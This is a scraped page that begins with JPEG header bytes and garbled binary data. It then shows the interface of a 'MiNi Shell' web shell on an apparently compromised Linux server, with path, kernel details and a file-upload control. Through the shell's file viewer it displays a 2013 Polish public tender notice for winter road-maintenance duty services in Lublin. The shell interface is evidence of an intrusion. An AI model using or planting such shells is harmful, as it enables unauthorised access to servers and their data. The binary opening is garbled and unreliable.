JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/388186-N-2013.html

<p class="kh_header"><b>Lublin: Usługi polegające na pełnieniu dyżurów przy zimowym utrzymaniu dróg wojewódzkich w sezonie zimowym 2013/2014</b><br>
<b>Numer ogłoszenia: 388186 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich , ul. Turystyczna 7A, 20-207 Lublin, woj. lubelskie, tel. 081 7495300, faks 081 7495341.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi polegające na pełnieniu dyżurów przy zimowym utrzymaniu dróg wojewódzkich w sezonie zimowym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: usługa polegająca na pełnieniu dyżurów przy zimowym utrzymaniu dróg wojewódzkich w sezonie zimowym 2013/2014
zgodnie z poniższym opisem przedmiotu zamówienia:
1) miejsce świadczenia usługi - RDW Biała Podlaska, OD Janów Podlaski, OD Łuków,   osoby odpowiedzialne za realizację przedmiotu umowy - Zbigniew Rabczewski, Dariusz Tarasiuk, Jarosław Kucia , maksymalna ilość godzin dyżurów - 3100
2) Miejsce świadczenia  usługi - RDW Chełm, OD Chełm, OD Wysokie, osoby odpowiedzialne za  realizację przedmiotu zamówienia - Mirosław Panasiuk, Krzysztof Korcz, Czesław Pop,  maksymalna ilość godzin dyżurów - 4000
3) Miejsce świadczenia usługi - RDW Hrubieszów, OD Tyszowce, OD Hrubieszów,  osoby odpowiedzialne za realizację zamówienia  - Andrzej Serafin, Mieczysław  Jachymek, Dariusz Mydlak,  maksymalna ilość godzin dyżurów - 3700
4)  Miejsce świadczenia usługi - RDW Lublin, OD Krzczonów, OD  Bełżyce,  osoby odpowiedzialne za realizację zamówienia - Tadeusz Otap, Mirosław Jędruch, Janusz Breś,  maksymalna ilość godzin dyżurów - 4500
5) Miejsce świadczenia usługi -  RDW Parczew,  OD Ostrów Lubelski, OD Parczew,  osoby odpowiedzialne za realizację zamówienia -  Ryszard Siatka, Ryszard Smolak, Stanisław Pawlak,  maksymalna ilość godzin dyżórów - 3000
6) Miejsce świadczenia  usługi -  RDW Puławy, OD Annopol, OD Puławy,  osoby odpowiedzialne za realizację zamówienia - Andrzej Chmielowski, Krzysztof Barabasz, Bogusław Pasternak, maksymalna ilość godzin dyżurów - 3200
7) Miejsce świadczenia usługi - RDW Włodawa, OD Dobropol, OD Średni Łan, osoby odpowiedzialne za realizację zamówienia - Mieczysław Chwała, Stanisław Głogowski,  Eugeniusz Andrejuk, maksymalna ilość godzin dyzurów - 1100
8) Miejsce świadczenie usługi -  RDW Zamość, OD Zamość, OD Biłgoraj, OD Józefów,  osoby odpowiedzialne za realizację zamówienia - Stanisław Bartosiak, Piotr Seń, Michał Żmijan,  Leszek Nieścior - maksymalna ilość godzin dyżurów - 6300
9) Miejsce świadczenia usługi - ZDW Lublin, osoby odpowiedzialne za realizację zamówienia - Piotr Gajewski - maksymalna ilość godzin dyżurów - 1100

Łączna maksymalna ilość godzin dyżurów - 30 000
2.Usługa obejmuje pełnienie dyżurów w okresie od 01.11.2013 do 31.03.2014 r. w dni wolne od pracy (soboty, niedziele i święta) oraz w pozostałe dni tygodnia w godz. od 22.00 do 6.00 dnia następnego w siedzibie Zamawiającego tj. Zarządu Dróg Wojewódzkich w Lublinie przy 
ul. Turystycznej 7a i ośmiu siedzibach RDW i Obwodach wskazanych w ust. 1 .
3. Faktyczne dni, w których będą pełnione  dyżury będą wskazywane przez Zamawiającego w     zależności od występujących potrzeb.
4. Wykonawca zobowiązany jest do dysponowania odpowiednio wyszkolonym personelem 
[dyżurnymi] w ilości nie mniejszej niż 80 osób w celu należytego wykonania Umowy oraz do zapewnienia fachowej obsługi dyżurów przy zimowym utrzymaniu dróg wojewódzkich.
5. Zakres obowiązków Wykonawcy w Rejonach Dróg Wojewódzkich i Obwodach Drogowych:
5.1. Osoby pełniące dyżury winny znać:
a.Wytyczne zimowego utrzymania dróg z 2005 r.,
b.aktualne standardy zimowego utrzymania dróg w sezonie zimowym 2013/2014,
c.podział sieci dróg wojewódzkich w zależności od kolejności ich zimowego utrzymania,
d.plan operacyjny z.u.d. obsługiwanej jednostki terenowej [ RDW lub Obwodu ],
e.strukturę organizacyjną ZDW Lublin oraz jednostek podległych tj. Rejonów Dróg Wojewódzkich i Obwodów Drogowych,
f.wykaz Wykonawców, świadczących usługi sprzętowe w zakresie zwalczania śliskości 
i odśnieżania dróg wraz z obowiązującymi cenami jednostkowymi,    
g.formularze meldunków, obowiązujące w sezonie pełnienia dyżurów,
h.wzory protokołów zdawczo - odbiorczych, służących do przekazywania Wykonawcy sprzętu lub pojazdów służbowych (jeśli sprzęt lub pojazd służbowy został ujęty w Planie ZUD poszczególnego Rejonu i służyć będzie do realizacji powierzonych zadań przez Zamawiającego, a w szczególności do rozpoznania sytuacji drogowej w terenie i kontroli wykonanych usług zimowego utrzymania dróg), 
i.obsługę komputera, 
j.specyfikę prowadzenia akcji zimowego utrzymania dróg w stopniu pozwalającym na samodzielne pełnienie dyżurów. 
5.2.Zamawiający dopuszcza możliwość nieodpłatnego korzystania przez Wykonawcę z samochodu należącego do Zamawiającego. W przypadku konieczności nieodpłatnego skorzystania z samochodu Zamawiającego w czasie pełnienia dyżuru przez Wykonawcę, Kierownik RDW określi sposób i zasady jego rozliczenia. Dokument ten stanowić powinien załącznik do protokołu zdawczo - odbiorczego. 
5.3. Dyżury powinny być pełnione w dniach i godzinach, określonych w Harmonogramie dyżurów  zatwierdzonym przez Zamawiającego. Zastrzega się obowiązek przekazywania zmian pomiędzy dyżurnymi.
5.4. Dyżurni powinni w sposób umiejętny i rzetelny redagować treść meldunków zimowych na podstawie zebranych informacji o sytuacji na drogach i przekazywać je na szczebel wyższy, tj. dyżurni z Obwodów Drogowych dyżurnemu w siedzibie Rejonu Dróg Wojewódzkich a dyżurny Rejonu do Zarządu Dróg Wojewódzkich w Lublinie w godzinach określonych w Planie Zimowego Utrzymania Dróg, a także wg potrzeb.
5.5.Udzielać bieżących informacji o stanie dróg przewoźnikom i osobom prywatnym.
5.6. Prowadzić rejestr pracy sprzętu, pracującego przy zimowym utrzymaniu dróg oraz zużycia materiałów do zwalczania śliskości.
5.7. Prowadzić dzienne rozliczenie kosztów zimowego utrzymania dróg dla sprzętu p/gołoledziowego, odśnieżnego i zużycia materiałów. Informację o kosztach przekazywać w kolejności określonej w punkcie 5.4.
5.8 Prowadzić rejestr/dziennik przebiegu dyżuru w Dzienniku Dyżurów, w którym dyżurni obowiązani są wpisywać wszystkie istotne informacje o stanie pogody, zgłaszanych zdarzeniach na drodze, interwencjach, udzielanych informacjach o stanie dróg.
6. Obowiązki dyżurnych w Zarządzie Dróg Wojewódzkich w Lublinie:
6.1.  Osoby pełniące dyżury winny:
a.znać Wytyczne zimowego utrzymania dróg z 2005 r.,
b.znać aktualne standardy zimowego utrzymania dróg w sezonie zimowym 2013/2014,
c.znać podział sieci dróg w zależności od kolejności ich zimowego utrzymania,
d.znać plan operacyjny z.u.d. Zarządu Dróg Wojewódzkich w Lublinie,
e.znać sposoby posługiwania się komputerem,
f.znać specyfikę prowadzenia akcji zimowego utrzymania dróg w stopniu pozwalającym na szybkie podejmowanie decyzji, a w razie konieczności niezwłocznym powiadomieniu Dyrektora  Zarządu Dróg Wojewódzkich w Lublinie,
g.przyjmować od podległych jednostek terenowych meldunki dot. zimowego utrzymania dróg wojewódzkich;
h.przekazywać meldunki za pośrednictwem poczty elektronicznej do Dyrekcji ZDW 
w Lublinie, dyżurnego Urzędu Marszałkowskiego oraz Centrum Zarządzania  Kryzysowego przy Urzędzie Wojewódzkim w Lublinie;
i.udzielać bieżących informacji o stanie dróg środkom masowego przekazu oraz osobom prywatnym;
j.natychmiast zawiadamiać Zamawiającego oraz środki masowego przekazu o sytuacjach krytycznych na drogach (np. zablokowana droga w wyniku wypadku lub kolizji, brak przejezdności drogi w wyniku śnieżycy i utworzenia się zasp, itp.)
k.współpracować z ościennymi Zarządami Dróg, Policją i innymi służbami, działającymi na rzecz akcji zimowej. 
6.2. Dyżury należy pełnić ściśle w dniach i godzinach określonych w Harmonogramie dyżurów, zatwierdzonym przez Zamawiającego, przy czym obowiązuje przekazywanie obowiązków dyżurnego między zmianami.
6.3.W sposób umiejętny i rzetelny sprawdzać treść przychodzących informacji o sytuacji na drogach (meldunków).
6.4.Przekazywać na bieżąco decyzje upoważnionych przedstawicieli Zamawiającego na szczebel niższy oraz wszelkie inne informacje (np. prognozy pogody, komunikaty CZK, itp.) mające istotny wpływ na przebieg akcji zimowej.
  6.5 Prowadzić rejestr przebiegu dyżuru w Dzienniku Dyżurów, w którym dyżurni obowiązani są wpisywać wszystkie istotne informacje o stanie pogody, zgłaszanych zdarzeniach na drodze, interwencjach, udzielanych informacjach o stanie dróg.
7. Usługi będą realizowane wg następujących zasad:
a.termin realizacji usług oraz ilość godzin dyżuru będą uzależnione od rzeczywistych potrzeb, warunków meteorologicznych i aktualnej sytuacji na drogach,
b.Zamawiający zastrzega sobie prawo powoływania i odwoływania dyżurów,
c.Wykonawca bezzwłocznie po otrzymaniu zapotrzebowania od upoważnionego przedstawiciela Zamawiającego w formie pisemnej, ustnej, elektronicznej bądź telefonicznej, powinien przystąpić do pełnienia dyżurów,
d.Wykonawca będzie mógł nieodpłatnie korzystać z lokali, środków łączności, środków transportu na zasadach określonych w pkt. 5.2 i wyposażenia biurowego Zamawiającego w miejscu pełnienia dyżurów pod warunkiem wykorzystywania ich wyłącznie do wykonywania zleconych przez Zamawiającego usług, 
e.Wykonawca odpowiada prawnie i materialnie za skutki ewentualnych nieprawidłowych decyzji podjętych przez osoby pełniące dyżury.
f.Wykonawca odpowiada materialnie za uszkodzenia wyposażenia biurowego i środków łączności, i samochodów będących własnością Zamawiającego,
g.Wykonawca wyznaczy osoby, które pełnić będą role koordynatorów usług w poszczególnych RDW, Obwodach  i w siedzibie Zamawiającego, do których obowiązków będzie należało sprawowanie nadzoru nad osobami dyżurującymi, przygotowywanie i zatwierdzanie miesięcznych harmonogramów dyżurów., bieżąca kontrola ilości godzin dyżurów, sporządzanie miesięcznych wykazów, itp.) 
h.Zakończenie świadczenia usług objętych Umową nastąpi z chwilą z zakończenia prowadzenia akcji zimowej w sezonie zimowym 2013/2014. 
8. Wykonawca zobowiązany jest we własnym zakresie zapłacić wszelkiego rodzaju podatki, składki, opłaty i inne świadczenia wynikające z powszechnie obowiązujących przepisów prawa, za osoby pełniące dyżury w ramach niniejszej umowy.
9. W przypadku, gdyby na mocy decyzji administracyjnej, prawomocnego orzeczenia Sądu lub innego zdarzenia,  Zamawiający został zobowiązany do zapłacenia podatków, składek, opłat i innych świadczeń wynikających z powszechnie obowiązujących przepisów prawa, za osoby pełniące dyżury w ramach niniejszej umowy, Wykonawca zobowiązany jest do zwrotu na rzecz Zamawiającego uiszczonych przez niego kwot wraz z odsetkami, kosztami procesu i pozostałymi należnościami.
10. W terminie minimum 7 dni przed rozpoczęciem sezonu zimowego Wykonawca zobowiązany jest zorganizować szkolenie w celu zapoznania osób pełniących dyżury z zakresem ich obowiązków i uprawnień. 
11.Zamawiający zastrzega sobie prawo do weryfikacji wiadomości i uprawnień osób pełniących dyżury oraz niedopuszczenia określonych osób do pełnienia dyżurów w przypadku stwierdzenia braku wymaganych wiadomości i uprawnień. 

Wartość zamówienia -802 777,78 zł netto.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości: 8.000,00 zł, słownie złotych: osiem tysięcy 00/100.
2. Wadium może być wnoszone w jednej lub kilku następujących formach zgodnie z  art. 45, ust. 6 ustawy Prawo zamówień publicznych:
1)Pieniądzu;
2)Poręczeniach bankowych lub poręczeniach spółdzielczej kasy  oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)Gwarancjach bankowych;
4)Gwarancjach ubezpieczeniowych;
5)Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158, z późń. zm.)
3.Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie nr 89 1500 1520 1215 2004 1596 0000. W tytule wpłaty zaleca się wpisanie: wadium na pełnienie dyżurów zimowych w sezonie 2013/2014
4.W ofercie należy złożyć dokument potwierdzający wniesienie wadium.

UWAGA:
1.Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt.1  ustawy Prawo bankowe z dnia 29 sierpnia 1997 r. (Dz. U z 2002 Nr 72 poz. 665 j. t.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą 
i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2.Wadium wnoszone przelewem (art. 45 ust. 7 ustawy pzp) uważa się za wniesione 
w terminie jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Zamawiający dokona oceny spełniania warunku udziału polegającego na dysponowaniu osobami zdolnymi do wykonania zamówienia w oparciu o Załącznik Oświadczenie o spełnieniu warunków udziału w postępowaniu. Warunek zostanie uznany za spełniony, gdy Wykonawca oświadczy, że dysponuje osobami zdolnymi do wykonania zamówienia tj. minimum jedną osobą posiadająca doświadczenie w pełnieniu dyżurów przy zimowym utrzymaniu dróg lub w koordynacji pracy zespołu.
2. W przypadku, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów Zamawiający żąda dołączenia do oferty w szczególności pisemnego zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania lub kserokopię zobowiązania poświadczoną, za zgodność z oryginałem przez ten podmiot (zgodnie z wyrokami KIO nr;  KIO 786/11, KIO 787/11, KIO 797/11, KIO 830/11, KIO 1008/11)  
UWAGA!
1)W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie realizacji zamówienia. W tym celu Wykonawca przedstawi Zamawiającemu dokumenty zawierające informacje dotyczące: zakresu zasobów jakie zostają mu udostępnione przez inny podmiot, sposobu wykorzystania zasobów innego podmiotu, charakteru stosunku, jaki łączy Wykonawcę z innym podmiotem, zakresu 
i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
2)Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji  niezbędnych zasobów winno posiadać formę pisemną,  stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci.(Zgodnie z wyrokiem KIO2213/11)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)Dowód wniesienia wadium.
b)Oferta przetargowa (z ceną netto i z podatkiem VAT) .
c)Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcy 

d)W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument (np. odpowiednią umowę) ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
e)	W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które nie są wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument potwierdzający prawo do reprezentowania podmiotu przez osobę/osoby podpisujące ofertę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, polegających na:  
a)zmianie wynagrodzenia, w przypadku  gdy zmianie uległy stawki podatku VAT,
b)zmianie terminu rozpoczęcia świadczenia usług w przypadku wniesienia odwołania po upływie terminu otwarcia ofert.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdw.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia można odebrać w siedzibie Zamawiającego, lok. 203, lub pocztą elektroniczną po wcześniejszym przesłaniu zamówienia na adres:dzp@zdw.lublin.pl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, ul. Turystyczna 7a, pok. 107. Otwarcie ofert nastąpi w dniu 03.10.2013 o godz.10:30 w pok. 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacje o sposobie porozumiewania się zamawiającego z wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z wykonawcami.
1. Oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr (081) 749-53-41; (081) 749-53-77 lub drogą elektroniczną na adres e-mail: dzp@zdw.lublin.pl. 
2. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
3. Językiem do porozumiewania się jest język polski.

Osoby uprawnione do porozumiewania się z wykonawcami: 
1.	  W zakresie przedmiotu zamówienia - Wydział Dróg i Mostów, Piotr Gajewski (81) 749-53-42.
2.	  W sprawach formalno-prawnych związanych z postępowaniem o udzielenie zamówienia 
i zawarciem umowy - Wydział Umów, Sławomir Szepietowski, tel. (81) 749-53-44; 749-53-29.
